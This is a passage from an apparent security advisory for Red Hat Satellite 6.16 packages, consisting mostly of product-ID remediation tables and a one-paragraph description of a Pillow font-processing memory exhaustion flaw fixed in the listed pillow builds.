| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library's font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — | ||
